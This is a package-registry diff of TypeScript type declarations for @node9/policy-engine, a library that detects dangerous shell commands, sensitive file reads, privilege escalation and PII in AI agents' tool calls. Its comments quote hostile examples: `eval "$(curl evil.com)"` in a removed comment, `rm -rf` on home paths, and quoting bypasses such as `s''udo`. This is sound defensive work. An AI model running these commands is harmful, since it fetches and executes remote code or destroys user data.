@node9/policy-engine 1.4.0 → 1.26.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/dist/index.d.mts CHANGED
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
133
133
  found: string[];
134
134
  };
135
135
 
136
- /**
137
- * Normalizes a bash command string for policy rule matching by replacing
138
- * pure-literal quoted strings that follow known message flags (e.g. -m, --body)
139
- * with empty double-quotes. This prevents text inside commit messages and PR
140
- * descriptions from triggering shell security rules.
141
- *
142
- * Unlike a regex-based approach, this uses the AST so it handles all quoting
143
- * styles correctly and won't over-strip. Execution flags like -c and -e
144
- * (psql, node, python) are intentionally left alone so their SQL/code
145
- * content continues to be evaluated by smart rules.
146
- *
147
- * Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
148
- * so patterns like `eval "$(curl evil.com)"` are always preserved.
149
- */
150
136
  declare function normalizeCommandForPolicy(command: string): string;
151
137
  /**
152
138
  * AST-based detection of dangerous shell execution patterns.
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
164
150
  declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
165
151
  /** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
166
152
  declare const detectDangerousEval: typeof detectDangerousShellExec;
153
+ interface FsOpVerdict {
154
+ ruleName: string;
155
+ verdict: 'block' | 'review';
156
+ reason: string;
157
+ /** The actual path argument from the user's command — for explainability. */
158
+ path: string;
159
+ }
160
+ declare const BASH_TOOL_NAMES: Set<string>;
161
+ declare function isBashTool(toolName: string): boolean;
162
+ declare const AST_FS_REGEX_RULES: Set<string>;
163
+ /**
164
+ * True when `path` is under $HOME (~ or absolute /home/* or /root) AND not in
165
+ * the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
166
+ */
167
+ declare function isProtectedHomePath(rawPath: string): boolean;
168
+ declare function analyzeFsOperation(command: string): FsOpVerdict | null;
167
169
  interface ShellCommandAnalysis {
168
170
  /** First word of every CallExpr — the command names invoked. */
169
171
  actions: string[];
@@ -731,7 +733,216 @@ declare function summarizeBlast(result: BlastResult, opts?: {
731
733
  topN?: number;
732
734
  }): BlastSummary;
733
735
 
736
+ /**
737
+ * Destructive-op regex. Word-boundary anchored so partial matches don't
738
+ * fire (e.g. "term" inside "terminate" wouldn't match `\brm\b`). Each
739
+ * pattern is independently provable as destructive — no fuzzy heuristics.
740
+ */
741
+ declare const DESTRUCTIVE_OP_RE: RegExp;
742
+ /**
743
+ * Historical privilege-escalation regex. **No longer used by the canonical
744
+ * detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
745
+ * AST tokenization (analyzeShellCommand actions + allTokens) so:
746
+ * - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
747
+ * - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
748
+ * stop firing false positives — those don't put the action name in
749
+ * `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
750
+ *
751
+ * Kept as a public export for non-AST consumers that grep raw command
752
+ * strings (smart-rule conditions that match on the literal command text)
753
+ * and as documentation of the historical pattern set. Removing it would
754
+ * be a breaking change for downstream package consumers.
755
+ */
756
+ declare const PRIVILEGE_ESCALATION_RE: RegExp;
757
+ /**
758
+ * Sensitive file paths the agent shouldn't be reading via tool calls.
759
+ * Mirrors the blast walker's path set — same files matter, here detected
760
+ * at tool-call-time rather than fs-walk-time.
761
+ *
762
+ * `\b` boundaries on names so substring noise doesn't trigger; the
763
+ * patterns assume the proxy normalises ~ in inputs (which it does
764
+ * via path expansion before we see them).
765
+ */
766
+ declare const SENSITIVE_PATH_RE: RegExp;
767
+ /**
768
+ * Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
769
+ * to file-reading tools so the same path appearing in a Bash command doesn't
770
+ * double-count against a Read of the same file.
771
+ */
772
+ declare const FILE_TOOLS: Set<string>;
773
+
774
+ type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
775
+ /**
776
+ * Detect PII patterns in a string. Returns a deduplicated list — one entry
777
+ * per distinct pattern type, never multiple "Email" findings from one input.
778
+ */
779
+ declare function detectPii(text: string): PiiPattern[];
780
+
781
+ type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
782
+ type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
783
+ type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
784
+ interface CanonicalFinding {
785
+ /** Discriminator. Maps 1:1 to ScanFinding.type for the SaaS upload. */
786
+ type: CanonicalFindingType;
787
+ /**
788
+ * Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
789
+ * rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
790
+ * For built-in detector findings (PII, DLP, regex), a synthetic name keyed
791
+ * on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
792
+ */
793
+ ruleName: string;
794
+ /** Block or review. Findings only exist for fired rules — no allow/info. */
795
+ verdict: 'block' | 'review';
796
+ /** Severity tier. Single source of truth — produced once at the engine. */
797
+ severity: Severity;
798
+ /** Engine-generated reason. Never carries user PII or raw secrets. */
799
+ reason: string;
800
+ /** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
801
+ patternName?: string;
802
+ /** Tool that produced the call. */
803
+ toolName: string;
804
+ agent: CanonicalAgent;
805
+ sessionId: string;
806
+ /** Project label or working directory the session lives in. */
807
+ project: string;
808
+ /** Local JSONL line offset. Never exfiltrated; used for dedupe. */
809
+ lineIndex: number;
810
+ /** Where the rule came from. 'engine' for built-in detectors. */
811
+ sourceType: CanonicalSourceType;
812
+ /** Optional shield/source label for UI. */
813
+ shieldLabel?: string;
814
+ /** When this exact (post-dedupe) finding was first / last seen. */
815
+ firstSeenAt: string;
816
+ lastSeenAt: string;
817
+ /** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
818
+ occurrenceCount: number;
819
+ /** AST findings: the path that triggered the verdict. */
820
+ subjectPath?: string;
821
+ /** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
822
+ costUsd?: number;
823
+ /** Loop findings: number of iterations. */
824
+ loopCount?: number;
825
+ loopKind?: 'loop' | 'long-iteration';
826
+ /** Loop findings: a sanitized command preview for UI. */
827
+ commandPreview?: string;
828
+ /** Raw tool input. Local CLI render only. */
829
+ input?: Record<string, unknown>;
830
+ /** DLP UI: first/last chars of the matched value with the middle replaced. */
831
+ redactedSample?: string;
832
+ }
833
+ /**
834
+ * Normalized per-call entry the per-line extractor consumes. Hosts (CLI
835
+ * scan, daemon, backfill) parse agent-specific JSONL into this shape so
836
+ * extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
837
+ * Codex line layouts.
838
+ */
839
+ interface ToolCallEntry {
840
+ toolName: string;
841
+ args: Record<string, unknown>;
842
+ timestamp: string;
843
+ /** Bytes of tool result content for long-output detection. 0 / undefined
844
+ * for non-result entries. */
845
+ outputBytes?: number;
846
+ }
847
+ interface ExtractContext {
848
+ sessionId: string;
849
+ lineIndex: number;
850
+ project: string;
851
+ agent: CanonicalAgent;
852
+ rules: ReadonlyArray<{
853
+ rule: SmartRule;
854
+ sourceType: CanonicalSourceType;
855
+ shieldLabel?: string;
856
+ }>;
857
+ /** toolInspection map from PolicyConfig — drives shell-command extraction
858
+ * for tools that aren't the standard 'bash' name. Defaults handled by caller. */
859
+ toolInspection: Record<string, string>;
860
+ /** DLP enabled flag from PolicyConfig. */
861
+ dlpEnabled: boolean;
862
+ }
863
+ interface SessionExtractContext {
864
+ sessionId: string;
865
+ project: string;
866
+ agent: CanonicalAgent;
867
+ /**
868
+ * Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
869
+ *
870
+ * `windowSeconds: 0` means "no window" — count all matching calls in the
871
+ * session regardless of timing. This is the right setting for historical
872
+ * backfill (--upload-history): an agent that hammered the same Edit on
873
+ * the same file 126 times across hours is the loop pattern users care
874
+ * about, but a 120s window would never fire on it. The live hook keeps
875
+ * the small window because it's racing against an actively running agent.
876
+ */
877
+ loopDetection: {
878
+ enabled: boolean;
879
+ threshold: number;
880
+ windowSeconds: number;
881
+ };
882
+ }
883
+ interface SessionToolCall extends ToolCallEntry {
884
+ /** Local JSONL line where this call lived — propagates to the loop finding. */
885
+ lineIndex: number;
886
+ }
887
+ declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
888
+ /**
889
+ * Wire-format identity of the canonical detector pipeline. Bumped when
890
+ * extractCanonicalFindings (and friends) change their output in a way
891
+ * that would invalidate verdicts already recorded against the previous
892
+ * version. The daemon stores this in ~/.node9/scan-watermark.json and
893
+ * triggers a one-time re-scan when its persisted value falls behind.
894
+ *
895
+ * Bump it when:
896
+ * - adding/removing a CanonicalFindingType
897
+ * - changing severity classification for an existing type
898
+ * - changing dedupe keys (would silently re-bucket existing findings)
899
+ * - any semantic change to the detectors that affects emitted counts
900
+ *
901
+ * Don't bump for:
902
+ * - comment-only edits
903
+ * - jsdoc tweaks
904
+ * - refactors that demonstrably preserve output
905
+ *
906
+ * scripts/check-extractor-version.mjs hashes the detector source files
907
+ * and fails CI when the hash drifts without a version bump — forgetting
908
+ * is loud, not silent.
909
+ */
910
+ declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
911
+ /**
912
+ * SHA-256 prefix of the detector-source files
913
+ * (canonical.ts + pii.ts + destructive-regex.ts).
914
+ *
915
+ * Updated by `npm run bump-extractor-version`. The CI gate in
916
+ * `.github/workflows/ci.yml` recomputes the hash on every push and fails
917
+ * if it doesn't match this constant — the contract is "if any of those
918
+ * files changed, this hash must change too, and you must consciously
919
+ * decide whether to bump CANONICAL_EXTRACTOR_VERSION."
920
+ */
921
+ declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
922
+ declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
923
+ declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
924
+ /**
925
+ * Collapse equivalent findings into one row, summing occurrenceCount and
926
+ * spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
927
+ * (type, ruleName, command-preview, project, agent) — same shape scan.ts
928
+ * uses today (line 502), with `agent` added so cross-agent matches stay
929
+ * separated for the dashboard's per-agent breakdown.
930
+ */
931
+ declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
932
+ /**
933
+ * Project a CanonicalFinding into the privacy-safe ScanFinding shape the
934
+ * proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
935
+ * `subjectPath` — anything that could carry user content. Counts and pattern
936
+ * names only, matching the privacy invariant in scan/index.ts.
937
+ *
938
+ * Returns null if the type doesn't have a corresponding ScanFinding bucket
939
+ * (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
940
+ * shield rule name and aren't part of the count-based summary).
941
+ */
942
+ declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
943
+ declare function previewArgs(input: Record<string, unknown>, max: number): string;
944
+
734
945
  /** Engine version stamped on audit entries for future drift detection. */
735
946
  declare const ENGINE_VERSION = "1.4.0";
736
947
 
737
- export { type AuditEntryForClassify, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, COST_PER_LOOP_ITER_USD, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, truncateBlastPath, validateOverrides, validateRegex, validateShieldDefinition };
948
+ export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, validateOverrides, validateRegex, validateShieldDefinition };
package/dist/index.d.ts CHANGED
@@ -133,20 +133,6 @@ declare function redactText(text: string): {
133
133
  found: string[];
134
134
  };
135
135
 
136
- /**
137
- * Normalizes a bash command string for policy rule matching by replacing
138
- * pure-literal quoted strings that follow known message flags (e.g. -m, --body)
139
- * with empty double-quotes. This prevents text inside commit messages and PR
140
- * descriptions from triggering shell security rules.
141
- *
142
- * Unlike a regex-based approach, this uses the AST so it handles all quoting
143
- * styles correctly and won't over-strip. Execution flags like -c and -e
144
- * (psql, node, python) are intentionally left alone so their SQL/code
145
- * content continues to be evaluated by smart rules.
146
- *
147
- * Dynamic content (CmdSubst, ParamExp) inside double-quotes is never stripped
148
- * so patterns like `eval "$(curl evil.com)"` are always preserved.
149
- */
150
136
  declare function normalizeCommandForPolicy(command: string): string;
151
137
  /**
152
138
  * AST-based detection of dangerous shell execution patterns.
@@ -164,6 +150,22 @@ declare function normalizeCommandForPolicy(command: string): string;
164
150
  declare function detectDangerousShellExec(command: string): 'block' | 'review' | null;
165
151
  /** @deprecated Use detectDangerousShellExec — kept for backwards compatibility */
166
152
  declare const detectDangerousEval: typeof detectDangerousShellExec;
153
+ interface FsOpVerdict {
154
+ ruleName: string;
155
+ verdict: 'block' | 'review';
156
+ reason: string;
157
+ /** The actual path argument from the user's command — for explainability. */
158
+ path: string;
159
+ }
160
+ declare const BASH_TOOL_NAMES: Set<string>;
161
+ declare function isBashTool(toolName: string): boolean;
162
+ declare const AST_FS_REGEX_RULES: Set<string>;
163
+ /**
164
+ * True when `path` is under $HOME (~ or absolute /home/* or /root) AND not in
165
+ * the tool-managed cache allow-list. Used to gate `rm -rf` on home paths.
166
+ */
167
+ declare function isProtectedHomePath(rawPath: string): boolean;
168
+ declare function analyzeFsOperation(command: string): FsOpVerdict | null;
167
169
  interface ShellCommandAnalysis {
168
170
  /** First word of every CallExpr — the command names invoked. */
169
171
  actions: string[];
@@ -731,7 +733,216 @@ declare function summarizeBlast(result: BlastResult, opts?: {
731
733
  topN?: number;
732
734
  }): BlastSummary;
733
735
 
736
+ /**
737
+ * Destructive-op regex. Word-boundary anchored so partial matches don't
738
+ * fire (e.g. "term" inside "terminate" wouldn't match `\brm\b`). Each
739
+ * pattern is independently provable as destructive — no fuzzy heuristics.
740
+ */
741
+ declare const DESTRUCTIVE_OP_RE: RegExp;
742
+ /**
743
+ * Historical privilege-escalation regex. **No longer used by the canonical
744
+ * detector** — scan/canonical.ts moved sudo/su, chmod, and chown all to
745
+ * AST tokenization (analyzeShellCommand actions + allTokens) so:
746
+ * - Quoting bypasses (`s''udo`, `c\hmod`) don't slip past the matcher.
747
+ * - String literals like `echo "chmod 777 done"` or `cat /etc/sudoers`
748
+ * stop firing false positives — those don't put the action name in
749
+ * `actions`, only in `allTokens` (a Lit, not a CallExpr first-word).
750
+ *
751
+ * Kept as a public export for non-AST consumers that grep raw command
752
+ * strings (smart-rule conditions that match on the literal command text)
753
+ * and as documentation of the historical pattern set. Removing it would
754
+ * be a breaking change for downstream package consumers.
755
+ */
756
+ declare const PRIVILEGE_ESCALATION_RE: RegExp;
757
+ /**
758
+ * Sensitive file paths the agent shouldn't be reading via tool calls.
759
+ * Mirrors the blast walker's path set — same files matter, here detected
760
+ * at tool-call-time rather than fs-walk-time.
761
+ *
762
+ * `\b` boundaries on names so substring noise doesn't trigger; the
763
+ * patterns assume the proxy normalises ~ in inputs (which it does
764
+ * via path expansion before we see them).
765
+ */
766
+ declare const SENSITIVE_PATH_RE: RegExp;
767
+ /**
768
+ * Tool names that read or grep file contents. Used to gate SENSITIVE_PATH_RE
769
+ * to file-reading tools so the same path appearing in a Bash command doesn't
770
+ * double-count against a Read of the same file.
771
+ */
772
+ declare const FILE_TOOLS: Set<string>;
773
+
774
+ type PiiPattern = 'Email' | 'SSN' | 'Phone' | 'Credit Card';
775
+ /**
776
+ * Detect PII patterns in a string. Returns a deduplicated list — one entry
777
+ * per distinct pattern type, never multiple "Email" findings from one input.
778
+ */
779
+ declare function detectPii(text: string): PiiPattern[];
780
+
781
+ type CanonicalFindingType = 'smart-rule' | 'ast-fs-op' | 'dlp' | 'pii' | 'sensitive-file-read' | 'privilege-escalation' | 'destructive-op' | 'pipe-to-shell' | 'eval-of-remote' | 'loop' | 'long-output-redacted';
782
+ type CanonicalAgent = 'claude' | 'gemini' | 'codex' | 'shell';
783
+ type CanonicalSourceType = 'default' | 'shield' | 'user' | 'engine';
784
+ interface CanonicalFinding {
785
+ /** Discriminator. Maps 1:1 to ScanFinding.type for the SaaS upload. */
786
+ type: CanonicalFindingType;
787
+ /**
788
+ * Stable rule identifier. For type='smart-rule' / 'ast-fs-op' it's the
789
+ * rule name (e.g. 'block-rm-rf-home', 'shield:project-jail:block-read-ssh').
790
+ * For built-in detector findings (PII, DLP, regex), a synthetic name keyed
791
+ * on the detector + pattern (e.g. 'pii:email', 'dlp:GitHub Token').
792
+ */
793
+ ruleName: string;
794
+ /** Block or review. Findings only exist for fired rules — no allow/info. */
795
+ verdict: 'block' | 'review';
796
+ /** Severity tier. Single source of truth — produced once at the engine. */
797
+ severity: Severity;
798
+ /** Engine-generated reason. Never carries user PII or raw secrets. */
799
+ reason: string;
800
+ /** Pattern name for DLP/PII (e.g. 'GitHub Token', 'Email'). */
801
+ patternName?: string;
802
+ /** Tool that produced the call. */
803
+ toolName: string;
804
+ agent: CanonicalAgent;
805
+ sessionId: string;
806
+ /** Project label or working directory the session lives in. */
807
+ project: string;
808
+ /** Local JSONL line offset. Never exfiltrated; used for dedupe. */
809
+ lineIndex: number;
810
+ /** Where the rule came from. 'engine' for built-in detectors. */
811
+ sourceType: CanonicalSourceType;
812
+ /** Optional shield/source label for UI. */
813
+ shieldLabel?: string;
814
+ /** When this exact (post-dedupe) finding was first / last seen. */
815
+ firstSeenAt: string;
816
+ lastSeenAt: string;
817
+ /** Post-dedupe match count. 1 by default, N for N collapsed raw matches. */
818
+ occurrenceCount: number;
819
+ /** AST findings: the path that triggered the verdict. */
820
+ subjectPath?: string;
821
+ /** Loop findings: dollar cost so far. Loop-only today; optional everywhere. */
822
+ costUsd?: number;
823
+ /** Loop findings: number of iterations. */
824
+ loopCount?: number;
825
+ loopKind?: 'loop' | 'long-iteration';
826
+ /** Loop findings: a sanitized command preview for UI. */
827
+ commandPreview?: string;
828
+ /** Raw tool input. Local CLI render only. */
829
+ input?: Record<string, unknown>;
830
+ /** DLP UI: first/last chars of the matched value with the middle replaced. */
831
+ redactedSample?: string;
832
+ }
833
+ /**
834
+ * Normalized per-call entry the per-line extractor consumes. Hosts (CLI
835
+ * scan, daemon, backfill) parse agent-specific JSONL into this shape so
836
+ * extractCanonicalFindings doesn't have to know about Claude vs Gemini vs
837
+ * Codex line layouts.
838
+ */
839
+ interface ToolCallEntry {
840
+ toolName: string;
841
+ args: Record<string, unknown>;
842
+ timestamp: string;
843
+ /** Bytes of tool result content for long-output detection. 0 / undefined
844
+ * for non-result entries. */
845
+ outputBytes?: number;
846
+ }
847
+ interface ExtractContext {
848
+ sessionId: string;
849
+ lineIndex: number;
850
+ project: string;
851
+ agent: CanonicalAgent;
852
+ rules: ReadonlyArray<{
853
+ rule: SmartRule;
854
+ sourceType: CanonicalSourceType;
855
+ shieldLabel?: string;
856
+ }>;
857
+ /** toolInspection map from PolicyConfig — drives shell-command extraction
858
+ * for tools that aren't the standard 'bash' name. Defaults handled by caller. */
859
+ toolInspection: Record<string, string>;
860
+ /** DLP enabled flag from PolicyConfig. */
861
+ dlpEnabled: boolean;
862
+ }
863
+ interface SessionExtractContext {
864
+ sessionId: string;
865
+ project: string;
866
+ agent: CanonicalAgent;
867
+ /**
868
+ * Loop-detection window settings. Mirrors PolicyConfig.policy.loopDetection.
869
+ *
870
+ * `windowSeconds: 0` means "no window" — count all matching calls in the
871
+ * session regardless of timing. This is the right setting for historical
872
+ * backfill (--upload-history): an agent that hammered the same Edit on
873
+ * the same file 126 times across hours is the loop pattern users care
874
+ * about, but a 120s window would never fire on it. The live hook keeps
875
+ * the small window because it's racing against an actively running agent.
876
+ */
877
+ loopDetection: {
878
+ enabled: boolean;
879
+ threshold: number;
880
+ windowSeconds: number;
881
+ };
882
+ }
883
+ interface SessionToolCall extends ToolCallEntry {
884
+ /** Local JSONL line where this call lived — propagates to the loop finding. */
885
+ lineIndex: number;
886
+ }
887
+ declare const LONG_OUTPUT_THRESHOLD_BYTES: number;
888
+ /**
889
+ * Wire-format identity of the canonical detector pipeline. Bumped when
890
+ * extractCanonicalFindings (and friends) change their output in a way
891
+ * that would invalidate verdicts already recorded against the previous
892
+ * version. The daemon stores this in ~/.node9/scan-watermark.json and
893
+ * triggers a one-time re-scan when its persisted value falls behind.
894
+ *
895
+ * Bump it when:
896
+ * - adding/removing a CanonicalFindingType
897
+ * - changing severity classification for an existing type
898
+ * - changing dedupe keys (would silently re-bucket existing findings)
899
+ * - any semantic change to the detectors that affects emitted counts
900
+ *
901
+ * Don't bump for:
902
+ * - comment-only edits
903
+ * - jsdoc tweaks
904
+ * - refactors that demonstrably preserve output
905
+ *
906
+ * scripts/check-extractor-version.mjs hashes the detector source files
907
+ * and fails CI when the hash drifts without a version bump — forgetting
908
+ * is loud, not silent.
909
+ */
910
+ declare const CANONICAL_EXTRACTOR_VERSION = "canonical-v4";
911
+ /**
912
+ * SHA-256 prefix of the detector-source files
913
+ * (canonical.ts + pii.ts + destructive-regex.ts).
914
+ *
915
+ * Updated by `npm run bump-extractor-version`. The CI gate in
916
+ * `.github/workflows/ci.yml` recomputes the hash on every push and fails
917
+ * if it doesn't match this constant — the contract is "if any of those
918
+ * files changed, this hash must change too, and you must consciously
919
+ * decide whether to bump CANONICAL_EXTRACTOR_VERSION."
920
+ */
921
+ declare const CANONICAL_EXTRACTOR_HASH = "64a6a63a27f4646f";
922
+ declare function extractCanonicalFindings(call: ToolCallEntry, ctx: ExtractContext): CanonicalFinding[];
923
+ declare function extractSessionLevelFindings(calls: ReadonlyArray<SessionToolCall>, ctx: SessionExtractContext): CanonicalFinding[];
924
+ /**
925
+ * Collapse equivalent findings into one row, summing occurrenceCount and
926
+ * spreading firstSeenAt / lastSeenAt across the matches. Dedupe key is
927
+ * (type, ruleName, command-preview, project, agent) — same shape scan.ts
928
+ * uses today (line 502), with `agent` added so cross-agent matches stay
929
+ * separated for the dashboard's per-agent breakdown.
930
+ */
931
+ declare function dedupeCanonicalFindings(findings: ReadonlyArray<CanonicalFinding>): CanonicalFinding[];
932
+ /**
933
+ * Project a CanonicalFinding into the privacy-safe ScanFinding shape the
934
+ * proxy sends to the SaaS. Drops `input`, `redactedSample`, `commandPreview`,
935
+ * `subjectPath` — anything that could carry user content. Counts and pattern
936
+ * names only, matching the privacy invariant in scan/index.ts.
937
+ *
938
+ * Returns null if the type doesn't have a corresponding ScanFinding bucket
939
+ * (currently `smart-rule` and `ast-fs-op` — those carry a user-defined or
940
+ * shield rule name and aren't part of the count-based summary).
941
+ */
942
+ declare function toScanFinding(c: CanonicalFinding): ScanFinding | null;
943
+ declare function previewArgs(input: Record<string, unknown>, max: number): string;
944
+
734
945
  /** Engine version stamped on audit entries for future drift detection. */
735
946
  declare const ENGINE_VERSION = "1.4.0";
736
947
 
737
- export { type AuditEntryForClassify, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, COST_PER_LOOP_ITER_USD, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, FLAGS_WITH_VALUES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallRecord, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, detectDangerousEval, detectDangerousShellExec, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractNetworkTargets, extractPositionalArgs, getCompiledRegex, getNestedValue, isIgnoredTool, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, truncateBlastPath, validateOverrides, validateRegex, validateShieldDefinition };
948
+ export { AST_FS_REGEX_RULES, type AuditEntryForClassify, BASH_TOOL_NAMES, BUILTIN_SHIELDS, type BlastEnvFinding, type BlastFinding, type BlastResult, type BlastSummary, CANONICAL_EXTRACTOR_HASH, CANONICAL_EXTRACTOR_VERSION, COST_PER_LOOP_ITER_USD, type CanonicalAgent, type CanonicalFinding, type CanonicalFindingType, type CanonicalSourceType, DESTRUCTIVE_OP_RE, DLP_PATTERNS, type DlpMatch, ENGINE_VERSION, type ExtractContext, FILE_TOOLS, FLAGS_WITH_VALUES, type FsOpVerdict, LONG_OUTPUT_THRESHOLD_BYTES, LOOP_MAX_RECORDS, LOOP_THRESHOLD_FOR_WASTE, type LoopWindowEvaluation, PRIVILEGE_ESCALATION_RE, type PiiPattern, type PipeChainAnalysis, type PolicyConfig, type PolicyContext, type PolicyHostHooks, type PolicyVerdict, type ProvenanceLookup, type ProvenanceTrust, type RiskMetadata, SCAN_SIGNAL_WEIGHTS, SENSITIVE_PATH_RE, SENSITIVE_PATH_REGEXES, type ScanFinding, type ScanSignals, type ScanSummary, type ScoreTier, type SessionExtractContext, type SessionToolCall, type Severity, type ShellCommandAnalysis, type ShieldDefinition, type ShieldOverrides, type ShieldVerdict, type SmartCondition, type SmartRule, type ToolCallEntry, type ToolCallRecord, analyzeFsOperation, analyzePipeChain, analyzeShellCommand, checkDangerousSql, classifyAuditEntry, classifyRuleSeverity, classifyScanSignal, computeArgsHash, computeBlendedSecurityScore, computeScanScore, computeSecurityScore, dedupeCanonicalFindings, detectDangerousEval, detectDangerousShellExec, detectPii, evaluateLoopWindow, evaluatePolicy, evaluateSmartConditions, extractAllSshHosts, extractCanonicalFindings, extractNetworkTargets, extractPositionalArgs, extractSessionLevelFindings, getCompiledRegex, getNestedValue, isBashTool, isIgnoredTool, isProtectedHomePath, isShieldVerdict, matchSensitivePath, matchesPattern, narrativeRuleLabel, normalizeCommandForPolicy, parseAllSshHostsFromCommand, previewArgs, redactText, scanArgs, scanText, sensitivePathMatch, summarizeBlast, summarizeScan, toScanFinding, truncateBlastPath, 